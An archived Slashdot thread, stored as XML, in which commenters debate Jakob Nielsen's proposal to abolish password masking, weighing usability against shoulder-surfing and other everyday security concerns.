<article>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#article09_06_25_1856214</id>
	<title>Nielsen Recommends Not Masking Passwords</title>
	<author>timothy</author>
	<datestamp>1245959220000</datestamp>
	<htmltext>Mark writes <i>"Usability expert and columnist Jakob Nielsen <a href="http://www.useit.com/alertbox/passwords.html">wants to abolish password masking</a>: 'Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures.' I've never been impressed by the argument that 'I can't think why we need this (standard) security measure, so let's drop it.'  It usually indicates a lack of imagination of the speaker.  But in this case, does usability outweigh security?"</i></htmltext>
<tokenext>Mark writes " Usability expert and columnist Jakob Nielsen wants to abolish password masking : 'Usability suffers when users type in passwords and the only feedback they get is a row of bullets .
Typically , masking passwords does n't even increase security , but it does cost you business due to login failures .
' I 've never been impressed by the argument that 'I ca n't think why we need this ( standard ) security measure , so let 's drop it .
' It usually indicates a lack of imagination of the speaker .
But in this case , does usability outweigh security ?
"</tokentext>
<sentencetext>Mark writes "Usability expert and columnist Jakob Nielsen wants to abolish password masking: 'Usability suffers when users type in passwords and the only feedback they get is a row of bullets.
Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures.
' I've never been impressed by the argument that 'I can't think why we need this (standard) security measure, so let's drop it.
'  It usually indicates a lack of imagination of the speaker.
But in this case, does usability outweigh security?
"</sentencetext>
</article>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475429</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245937200000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p> <b>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</b> </p><p>Yes!  I would!  I would want to see the research that lead him to his conclusion in physics.  Or, more specifically, I would want another physicist to look at his research and give his validation to say that it's sound.</p></div><p>Exactly! He's not the pope of physics, no one is, and thank god.</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field .
Yes ! I would !
I would want to see the research that lead him to his conclusion in physics .
Or , more specifically , I would want another physicist to look at his research and give his validation to say that it 's sound.Exactly !
He 's not the pope of physics , no one is , and thank god .</tokentext>
<sentencetext> If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.
Yes!  I would!
I would want to see the research that lead him to his conclusion in physics.
Or, more specifically, I would want another physicist to look at his research and give his validation to say that it's sound.Exactly!
He's not the pope of physics, no one is, and thank god.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482169</id>
	<title>HUH?</title>
	<author>Anonymous</author>
	<datestamp>1246030320000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This guy is a total idiot. he knows nothing about being in the IT field and about security. you got to be stupid to find it hard to know what you are typing in. as an administrator you have to type in your password A LOT while someone is watching. there is no point of having in clear text. you might as well have no password. because that is the point of having a password to keep it SECRET.</p></htmltext>
<tokenext>This guy is a total idiot .
he knows nothing about being in the IT field and about security .
you got to be stupid to find it hard to know what you are typing in .
as an administrator you have to type in your password A LOT while someone is watching .
there is no point of having in clear text .
you might as well have no password .
because that is the point of having a password to keep it SECRET .</tokentext>
<sentencetext>This guy is a total idiot.
he knows nothing about being in the IT field and about security.
you got to be stupid to find it hard to know what you are typing in.
as an administrator you have to type in your password A LOT while someone is watching.
there is no point of having in clear text.
you might as well have no password.
because that is the point of having a password to keep it SECRET.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349</id>
	<title>its not a problem for me</title>
	<author>circletimessquare</author>
	<datestamp>1245921240000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext><p>i can type my password without even looking</p><p>watch, i'll enter my bank account password without looking</p><p>fluffybunnies</p><p>see? i didn't even need to...</p><p>oh crap...</p><p>unsubmit</p><p>where's the damn unsubmit!</p></htmltext>
<tokenext>i can type my password without even lookingwatch , i 'll enter my bank account password without lookingfluffybunniessee ?
i did n't even need to...oh crap...unsubmitwhere 's the damn unsubmit !</tokentext>
<sentencetext>i can type my password without even lookingwatch, i'll enter my bank account password without lookingfluffybunniessee?
i didn't even need to...oh crap...unsubmitwhere's the damn unsubmit!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471017</id>
	<title>Not in a world with support analysts</title>
	<author>CambodiaSam</author>
	<datestamp>1245963420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Our company has support analysts that will shadow a user's machine for troubleshooting. The masking is a necessity for us. We want plausible deniability if someone claims a hacked account.</htmltext>
<tokenext>Our company has support analysts that will shadow a user 's machine for troubleshooting .
The masking is a necessity for us .
We want plausible deniability if someone claims a hacked account .</tokentext>
<sentencetext>Our company has support analysts that will shadow a user's machine for troubleshooting.
The masking is a necessity for us.
We want plausible deniability if someone claims a hacked account.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471931</id>
	<title>Reveal Password button</title>
	<author>flyingfsck</author>
	<datestamp>1245923040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Some of the better designed applications have a 'reveal password' button.  Most of the time there is no-one looking over your shoulder, so this option can indeed improve usability.</htmltext>
<tokenext>Some of the better designed applications have a 'reveal password ' button .
Most of the time there is no-one looking over your shoulder , so this option can indeed improve usability .</tokentext>
<sentencetext>Some of the better designed applications have a 'reveal password' button.
Most of the time there is no-one looking over your shoulder, so this option can indeed improve usability.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472883</id>
	<title>Nielson is an idiot</title>
	<author>djheru</author>
	<datestamp>1245926340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>If it were up to him, the www would still be plain text and images.  His philosophy boils down to "Lets design all websites to the lowest common denominator", which is fine if your website needs to have the widest possible audience, but most don't, just like most other forms of published content.

Just think. No password masking+browser form persistence features means that I just have to be able to go to, say, gmail on your machine, double click the username field, tab once, and I know your google password. Then I can go to the coffee shop, log into your blogger account, create some nice posts in your name, then log into your analytics account do some bad stuff there, etc.</htmltext>
<tokenext>If it were up to him , the www would still be plain text and images .
His philosophy boils down to " Lets design all websites to the lowest common denominator " , which is fine if your website needs to have the widest possible audience , but most do n't , just like most other forms of published content .
Just think .
No password masking + browser form persistence features means that I just have to be able to go to , say , gmail on your machine , double click the username field , tab once , and I know your google password .
Then I can go to the coffee shop , log into your blogger account , create some nice posts in your name , then log into your analytics account do some bad stuff there , etc .</tokentext>
<sentencetext>If it were up to him, the www would still be plain text and images.
His philosophy boils down to "Lets design all websites to the lowest common denominator", which is fine if your website needs to have the widest possible audience, but most don't, just like most other forms of published content.
Just think.
No password masking+browser form persistence features means that I just have to be able to go to, say, gmail on your machine, double click the username field, tab once, and I know your google password.
Then I can go to the coffee shop, log into your blogger account, create some nice posts in your name, then log into your analytics account do some bad stuff there, etc.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</id>
	<title>Security</title>
	<author>Anonymous</author>
	<datestamp>1245920520000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>One of the most irritating things is the way many websites, especially financial websites, are designed with no thought to the difference between use in a public setting and use in a private setting.  For instance, I only ever use my banking website from one place, my den, which is physically secure, yet I have to suffer through all sorts of crap designed to make sure my account doesn't get compromised in a public setting.  (The most annoying being automatic log outs for non-use.)</p><p>Masking passwords, logging off the user on non-use after ten minutes, and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security.  Websites should allow for this.</p></htmltext>
<tokenext>One of the most irritating things is the way many websites , especially financial websites , are designed with no thought to the difference between use in a public setting and use in a private setting .
For instance , I only ever use my banking website from one place , my den , which is physically secure , yet I have to suffer through all sorts of crap designed to make sure my account does n't get compromised in a public setting .
( The most annoying being automatic log outs for non-use .
) Masking passwords , logging off the user on non-use after ten minutes , and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security .
Websites should allow for this .</tokentext>
<sentencetext>One of the most irritating things is the way many websites, especially financial websites, are designed with no thought to the difference between use in a public setting and use in a private setting.
For instance, I only ever use my banking website from one place, my den, which is physically secure, yet I have to suffer through all sorts of crap designed to make sure my account doesn't get compromised in a public setting.
(The most annoying being automatic log outs for non-use.
)Masking passwords, logging off the user on non-use after ten minutes, and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security.
Websites should allow for this.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472287</id>
	<title>Re:Security</title>
	<author>DaMP12000</author>
	<datestamp>1245924180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>When you say your den is physically secure, you mean it's in a bunker with 4 inch thick steel walls and a retina+fingerprint scanner to get in with an auto destruct on failed attempts?

Otherwise, If somebody breaks in and steal your computers, I'm pretty sure you'll be happy your browsers don't display ALL your passwords in clear text, and don't even get me started on non expiring sessions. Bad enough they stole your stuff, you don't want want them to also steal all your online accounts (and $$$)

Personally, I was never ever bothered by a little security. It's like putting your seat belt. You might never ever have the use for it but the once in a lifetime occurrence when you need it to save your life, you'll be happy you'll have put it on.</htmltext>
<tokenext>When you say your den is physically secure , you mean it 's in a bunker with 4 inch thick steel walls and a retina + fingerprint scanner to get in with an auto destruct on failed attempts ?
Otherwise , If somebody breaks in and steal your computers , I 'm pretty sure you 'll be happy your browsers do n't display ALL your passwords in clear text , and do n't even get me started on non expiring sessions .
Bad enough they stole your stuff , you do n't want want them to also steal all your online accounts ( and $ $ $ ) Personally , I was never ever bothered by a little security .
It 's like putting your seat belt .
You might never ever have the use for it but the once in a lifetime occurrence when you need it to save your life , you 'll be happy you 'll have put it on .</tokentext>
<sentencetext>When you say your den is physically secure, you mean it's in a bunker with 4 inch thick steel walls and a retina+fingerprint scanner to get in with an auto destruct on failed attempts?
Otherwise, If somebody breaks in and steal your computers, I'm pretty sure you'll be happy your browsers don't display ALL your passwords in clear text, and don't even get me started on non expiring sessions.
Bad enough they stole your stuff, you don't want want them to also steal all your online accounts (and $$$)

Personally, I was never ever bothered by a little security.
It's like putting your seat belt.
You might never ever have the use for it but the once in a lifetime occurrence when you need it to save your life, you'll be happy you'll have put it on.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477921</id>
	<title>BORING.</title>
	<author>Anonymous</author>
	<datestamp>1245955380000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>BORING.</p></htmltext>
<tokenext>BORING .</tokentext>
<sentencetext>BORING.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481417</id>
	<title>ridiculous</title>
	<author>stanjam</author>
	<datestamp>1246027800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>So the author states that the row of bullets is useless, and costs us business, and doesn't increase security?  While password security is the weakest form of security we have, it IS better than nothing.  And the use of bullets to mask passwords is essential.  The author would like to pretend that no one has ever had to enter a password where a screen is available to multiple viewers, but that is indeed, sometimes the case.

The downturn is usability because someone can not see what they are typing is minimal at best. Ridiculous.</htmltext>
<tokenext>So the author states that the row of bullets is useless , and costs us business , and does n't increase security ?
While password security is the weakest form of security we have , it IS better than nothing .
And the use of bullets to mask passwords is essential .
The author would like to pretend that no one has ever had to enter a password where a screen is available to multiple viewers , but that is indeed , sometimes the case .
The downturn is usability because someone can not see what they are typing is minimal at best .
Ridiculous .</tokentext>
<sentencetext>So the author states that the row of bullets is useless, and costs us business, and doesn't increase security?
While password security is the weakest form of security we have, it IS better than nothing.
And the use of bullets to mask passwords is essential.
The author would like to pretend that no one has ever had to enter a password where a screen is available to multiple viewers, but that is indeed, sometimes the case.
The downturn is usability because someone can not see what they are typing is minimal at best.
Ridiculous.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477087</id>
	<title>Nielsen needs Firefox</title>
	<author>akayani</author>
	<datestamp>1245948240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>https://addons.mozilla.org/en-US/firefox/addon/462<br><br>The problem have already been solved for Firefox users. And I agree with Nielsen it's a pain if you are sitting in an area with privacy.<br><br>In fact I think some website are just a pain in the neck with the security requirement they inflict.<br><br>WTF would you need an 8 char password to comment on a newspaper article when my bank only requires 6. It's poor usability to max out security on sites that have minimal need.</htmltext>
<tokenext>https : //addons.mozilla.org/en-US/firefox/addon/462The problem have already been solved for Firefox users .
And I agree with Nielsen it 's a pain if you are sitting in an area with privacy.In fact I think some website are just a pain in the neck with the security requirement they inflict.WTF would you need an 8 char password to comment on a newspaper article when my bank only requires 6 .
It 's poor usability to max out security on sites that have minimal need .</tokentext>
<sentencetext>https://addons.mozilla.org/en-US/firefox/addon/462The problem have already been solved for Firefox users.
And I agree with Nielsen it's a pain if you are sitting in an area with privacy.In fact I think some website are just a pain in the neck with the security requirement they inflict.WTF would you need an 8 char password to comment on a newspaper article when my bank only requires 6.
It's poor usability to max out security on sites that have minimal need.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</id>
	<title>One word for Nielsen: Projector</title>
	<author>tcsh(1)</author>
	<datestamp>1245963300000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext>Ever logged in to a computer connected to an LCD projector?</htmltext>
<tokenext>Ever logged in to a computer connected to an LCD projector ?</tokentext>
<sentencetext>Ever logged in to a computer connected to an LCD projector?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839</id>
	<title>hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245962880000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p><div class="quote"><p> <b>Usability expert</b> and <b>columnist</b> Jakob Nielsen</p></div><p>Well, I'm glad they found such an unbiased and informed person to make such a statement about security versus usability.  And for a second there I was afraid he was just doing this for attention.  <br> <br>

Mr. Nielsen, could you send us screen shots of a working example?  Perhaps show us how it looks like when you log into the administrative console now with your password entered in and then a screenshot of the way you think it would be more usable.  I'll review them and let you know <a href="http://bash.org/?244321" title="bash.org" rel="nofollow">in a most interesting way</a> [bash.org] what I think.  <br> <br>

Perhaps you should read up on our friend <a href="http://en.wikipedia.org/wiki/Kevin\_Mitnick" title="wikipedia.org" rel="nofollow">Kevin Mitnick</a> [wikipedia.org] and <a href="http://science.slashdot.org/article.pl?sid=06/05/06/1247236" title="slashdot.org" rel="nofollow">NASA "Hacker" Gary McKinnon</a> [slashdot.org] both of whom are no strangers to the over-the-shoulder-attack.  Really, I'm no security expert or pen tester but I'm going to speculate that these 'soft hacks' are some of the most dangerous vulnerabilities left.  Your suggestion just makes them all the more easier.  Me personally would like to see the standard bumped up to the level of the input box not even being masked<nobr> <wbr></nobr>... no input is recorded in anyway on the screen.  Now <i>that's</i> a usability nightmare when you can't even backspace to correct your errors.  I don't think I've seen this since my days in a computer lab at college but I think sacrificing a few login attempts worth of time is worth the security.</p><p><div class="quote"><p>Typically, masking passwords doesn't even increase security<nobr> <wbr></nobr>...</p></div><p>[citation desperately needed]<br> <br>

I think back to the few times when I've entered my password accidentally into the username box because the tab key I hit didn't register or the site didn't support it and I just felt nervous and dirty and needed to change my password.  Just knowing that there were <a href="http://hardware.slashdot.org/article.pl?sid=07/04/20/2048258" title="slashdot.org" rel="nofollow">photons and radiation</a> [slashdot.org] everywhere in my cube belying my password to anyone who cared to capture them<nobr> <wbr></nobr>... I mean it's bad enough that the sound waves of my keystrokes <a href="http://it.slashdot.org/article.pl?sid=09/03/26/1947246" title="slashdot.org" rel="nofollow">are floating around telling people my password</a> [slashdot.org].  Sorry to go all tinfoil hat on you there.</p></div>
	</htmltext>
<tokenext>Usability expert and columnist Jakob NielsenWell , I 'm glad they found such an unbiased and informed person to make such a statement about security versus usability .
And for a second there I was afraid he was just doing this for attention .
Mr. Nielsen , could you send us screen shots of a working example ?
Perhaps show us how it looks like when you log into the administrative console now with your password entered in and then a screenshot of the way you think it would be more usable .
I 'll review them and let you know in a most interesting way [ bash.org ] what I think .
Perhaps you should read up on our friend Kevin Mitnick [ wikipedia.org ] and NASA " Hacker " Gary McKinnon [ slashdot.org ] both of whom are no strangers to the over-the-shoulder-attack .
Really , I 'm no security expert or pen tester but I 'm going to speculate that these 'soft hacks ' are some of the most dangerous vulnerabilities left .
Your suggestion just makes them all the more easier .
Me personally would like to see the standard bumped up to the level of the input box not even being masked ... no input is recorded in anyway on the screen .
Now that 's a usability nightmare when you ca n't even backspace to correct your errors .
I do n't think I 've seen this since my days in a computer lab at college but I think sacrificing a few login attempts worth of time is worth the security.Typically , masking passwords does n't even increase security ... [ citation desperately needed ] I think back to the few times when I 've entered my password accidentally into the username box because the tab key I hit did n't register or the site did n't support it and I just felt nervous and dirty and needed to change my password .
Just knowing that there were photons and radiation [ slashdot.org ] everywhere in my cube belying my password to anyone who cared to capture them ... I mean it 's bad enough that the sound waves of my keystrokes are floating around telling people my password [ slashdot.org ] .
Sorry to go all tinfoil hat on you there .</tokentext>
<sentencetext> Usability expert and columnist Jakob NielsenWell, I'm glad they found such an unbiased and informed person to make such a statement about security versus usability.
And for a second there I was afraid he was just doing this for attention.
Mr. Nielsen, could you send us screen shots of a working example?
Perhaps show us how it looks like when you log into the administrative console now with your password entered in and then a screenshot of the way you think it would be more usable.
I'll review them and let you know in a most interesting way [bash.org] what I think.
Perhaps you should read up on our friend Kevin Mitnick [wikipedia.org] and NASA "Hacker" Gary McKinnon [slashdot.org] both of whom are no strangers to the over-the-shoulder-attack.
Really, I'm no security expert or pen tester but I'm going to speculate that these 'soft hacks' are some of the most dangerous vulnerabilities left.
Your suggestion just makes them all the more easier.
Me personally would like to see the standard bumped up to the level of the input box not even being masked ... no input is recorded in anyway on the screen.
Now that's a usability nightmare when you can't even backspace to correct your errors.
I don't think I've seen this since my days in a computer lab at college but I think sacrificing a few login attempts worth of time is worth the security.Typically, masking passwords doesn't even increase security ...[citation desperately needed] 

I think back to the few times when I've entered my password accidentally into the username box because the tab key I hit didn't register or the site didn't support it and I just felt nervous and dirty and needed to change my password.
Just knowing that there were photons and radiation [slashdot.org] everywhere in my cube belying my password to anyone who cared to capture them ... I mean it's bad enough that the sound waves of my keystrokes are floating around telling people my password [slashdot.org].
Sorry to go all tinfoil hat on you there.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472843</id>
	<title>Showing passwords In plain text is always bad...</title>
	<author>Gnom3</author>
	<datestamp>1245926160000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Anytime your password is visible in plain text is bad. This includes when it's stored in a database, written on a post-it and pasted to your monitor, or anywhere else.
<br> <br>
As a software developer, there is no reason for me to ever show you your password in plain text even while it's being entered. In my opinion, the security benefits of the mask definitely out-weigh the usability costs.
<br> <br>
Just like how your stored passwords are visible in plain text in <a href="http://foxsys.blogspot.com/2008/07/firefox-3-saved-password-security.html" title="blogspot.com" rel="nofollow">Firefox</a> [blogspot.com] and <a href="http://foxsys.blogspot.com/2008/10/google-chrome-shows-saved-passwords-in.html" title="blogspot.com" rel="nofollow">Chrome</a> [blogspot.com] to anyone with a few seconds alone with your computer, showing them in plain text while entering them into passwords fields is a horrible idea.</htmltext>
<tokenext>Anytime your password is visible in plain text is bad .
This includes when it 's stored in a database , written on a post-it and pasted to your monitor , or anywhere else .
As a software developer , there is no reason for me to ever show you your password in plain text even while it 's being entered .
In my opinion , the security benefits of the mask definitely out-weigh the usability costs .
Just like how your stored passwords are visible in plain text in Firefox [ blogspot.com ] and Chrome [ blogspot.com ] to anyone with a few seconds alone with your computer , showing them in plain text while entering them into passwords fields is a horrible idea .</tokentext>
<sentencetext>Anytime your password is visible in plain text is bad.
This includes when it's stored in a database, written on a post-it and pasted to your monitor, or anywhere else.
As a software developer, there is no reason for me to ever show you your password in plain text even while it's being entered.
In my opinion, the security benefits of the mask definitely out-weigh the usability costs.
Just like how your stored passwords are visible in plain text in Firefox [blogspot.com] and Chrome [blogspot.com] to anyone with a few seconds alone with your computer, showing them in plain text while entering them into passwords fields is a horrible idea.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471251</id>
	<title>idiotic idea</title>
	<author>poetmatt</author>
	<datestamp>1245920940000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>0</modscore>
	<htmltext><p>Here's something people don't realize:</p><p>Remember all those laws about "in plain sight" and all that how law enforcement can steal your info just because something isn't locked away etc?</p><p>Well guess what happens to passwords like this. Spy through a window at home, etc.</p></htmltext>
<tokenext>Here 's something people do n't realize : Remember all those laws about " in plain sight " and all that how law enforcement can steal your info just because something is n't locked away etc ? Well guess what happens to passwords like this .
Spy through a window at home , etc .</tokentext>
<sentencetext>Here's something people don't realize:Remember all those laws about "in plain sight" and all that how law enforcement can steal your info just because something isn't locked away etc?Well guess what happens to passwords like this.
Spy through a window at home, etc.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471473</id>
	<title>Re:Only when registering</title>
	<author>mcgrew</author>
	<datestamp>1245921660000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>This means we no longer need to confirm passwords twice when registering</i></p><p>Even if the password wasn't masked, it woluld still be a good idea to require double entry, except, of course, for those folks who are perfect and never make a typoo. Not all typos stand out, and if you think you typed "ui9o" but actually typed "ui90" you'll not get into your account.</p></htmltext>
<tokenext>This means we no longer need to confirm passwords twice when registeringEven if the password was n't masked , it woluld still be a good idea to require double entry , except , of course , for those folks who are perfect and never make a typoo .
Not all typos stand out , and if you think you typed " ui9o " but actually typed " ui90 " you 'll not get into your account .</tokentext>
<sentencetext>This means we no longer need to confirm passwords twice when registeringEven if the password wasn't masked, it woluld still be a good idea to require double entry, except, of course, for those folks who are perfect and never make a typoo.
Not all typos stand out, and if you think you typed "ui9o" but actually typed "ui90" you'll not get into your account.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193</id>
	<title>Re:Two words</title>
	<author>amicusNYCL</author>
	<datestamp>1245920760000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>Oh, c'mon.</p><p><div class="quote"><p>So, password masking doesn't even protect fully against snoopers.</p></div><p>No, it doesn't protect <b>fully</b>, but it does protect from everyone who can't see the keyboard when you type.  In other words, it protects against every shoulder-surfing scenario except when the person is looking directly at the keyboard when you type.  And even then, if you're typing fast enough or the keys are close enough together you won't be able to guess the password by watching the keyboard.  Hell, I'm sitting right in front of the keyboard and I still can't look through my hands to see which keys my fingertips are actually pressing.  So, password masking <b>does</b> protect from shoulder-surfing.  It might not protect against people looking directly at your keyboard, but that might be because it's designed specifically to protect against people looking <b>at the goddamn monitor</b>.</p><p><div class="quote"><p>More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</p></div><p>OK, so this is a great usability solution for websites that only get accessed by people sitting alone in their offices without the possibility of a co-worker standing there as they log in.  For all other sites that people might access in an internet cafe, or at the airport, or in a coffee shop, or wherever else, I guess it doesn't apply at all.</p></div>
	</htmltext>
<tokenext>Oh , c'mon.So , password masking does n't even protect fully against snoopers.No , it does n't protect fully , but it does protect from everyone who ca n't see the keyboard when you type .
In other words , it protects against every shoulder-surfing scenario except when the person is looking directly at the keyboard when you type .
And even then , if you 're typing fast enough or the keys are close enough together you wo n't be able to guess the password by watching the keyboard .
Hell , I 'm sitting right in front of the keyboard and I still ca n't look through my hands to see which keys my fingertips are actually pressing .
So , password masking does protect from shoulder-surfing .
It might not protect against people looking directly at your keyboard , but that might be because it 's designed specifically to protect against people looking at the goddamn monitor.More importantly , there 's usually nobody looking over your shoulder when you log in to a website .
It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue.OK , so this is a great usability solution for websites that only get accessed by people sitting alone in their offices without the possibility of a co-worker standing there as they log in .
For all other sites that people might access in an internet cafe , or at the airport , or in a coffee shop , or wherever else , I guess it does n't apply at all .</tokentext>
<sentencetext>Oh, c'mon.So, password masking doesn't even protect fully against snoopers.No, it doesn't protect fully, but it does protect from everyone who can't see the keyboard when you type.
In other words, it protects against every shoulder-surfing scenario except when the person is looking directly at the keyboard when you type.
And even then, if you're typing fast enough or the keys are close enough together you won't be able to guess the password by watching the keyboard.
Hell, I'm sitting right in front of the keyboard and I still can't look through my hands to see which keys my fingertips are actually pressing.
So, password masking does protect from shoulder-surfing.
It might not protect against people looking directly at your keyboard, but that might be because it's designed specifically to protect against people looking at the goddamn monitor.More importantly, there's usually nobody looking over your shoulder when you log in to a website.
It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.OK, so this is a great usability solution for websites that only get accessed by people sitting alone in their offices without the possibility of a co-worker standing there as they log in.
For all other sites that people might access in an internet cafe, or at the airport, or in a coffee shop, or wherever else, I guess it doesn't apply at all.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473141</id>
	<title>Usability experts generally aren't very bright</title>
	<author>thetoadwarrior</author>
	<datestamp>1245927300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>With the amount of people that use computers in public, having a easily viewable password is just dumb. If you can't manage to remember what you've typed then slow down and think about your actions.</htmltext>
<tokenext>With the amount of people that use computers in public , having a easily viewable password is just dumb .
If you ca n't manage to remember what you 've typed then slow down and think about your actions .</tokentext>
<sentencetext>With the amount of people that use computers in public, having a easily viewable password is just dumb.
If you can't manage to remember what you've typed then slow down and think about your actions.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475543</id>
	<title>Re:hunter2</title>
	<author>Ernesto Alvarez</author>
	<datestamp>1245937740000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack". I just had to reset a users PW twice this afternoon because she locked herself out of her account. Sure, it's extra hassle but the security is worth it.</p></div></blockquote><p>It's a great recipe for a denial of service, too.</p><p>Good security is a process, not just doing one or two things you found on a cookbook.</p></div>
	</htmltext>
<tokenext>Good security involves locking out the user after a certain number of attempts in order to stop a " dictionary attack " .
I just had to reset a users PW twice this afternoon because she locked herself out of her account .
Sure , it 's extra hassle but the security is worth it.It 's a great recipe for a denial of service , too.Good security is a process , not just doing one or two things you found on a cookbook .</tokentext>
<sentencetext>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack".
I just had to reset a users PW twice this afternoon because she locked herself out of her account.
Sure, it's extra hassle but the security is worth it.It's a great recipe for a denial of service, too.Good security is a process, not just doing one or two things you found on a cookbook.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478437</id>
	<title>A silly joke :P</title>
	<author>Optimus6128</author>
	<datestamp>1246046520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Tech support: Hello?<br>User: I can't log in the internet!<br>Tech: What's the problem?<br>User: I type my password and it seem to be invalid.<br>Tech: Which one is your password?<br>User: I saw it when my dad was typing it. It is eight stars.<br>Tech: Duh<nobr> <wbr></nobr>:P</p></htmltext>
<tokenext>Tech support : Hello ? User : I ca n't log in the internet ! Tech : What 's the problem ? User : I type my password and it seem to be invalid.Tech : Which one is your password ? User : I saw it when my dad was typing it .
It is eight stars.Tech : Duh : P</tokentext>
<sentencetext>Tech support: Hello?User: I can't log in the internet!Tech: What's the problem?User: I type my password and it seem to be invalid.Tech: Which one is your password?User: I saw it when my dad was typing it.
It is eight stars.Tech: Duh :P</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471539</id>
	<title>Security theater</title>
	<author>sorak</author>
	<datestamp>1245921840000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>I can't think why we need this (standard) security measure, so let's drop it.</p></div><p>If you can't think of a reason we need it, and you keep it, then isn't that security theater?</p></div>
	</htmltext>
<tokenext>I ca n't think why we need this ( standard ) security measure , so let 's drop it.If you ca n't think of a reason we need it , and you keep it , then is n't that security theater ?</tokentext>
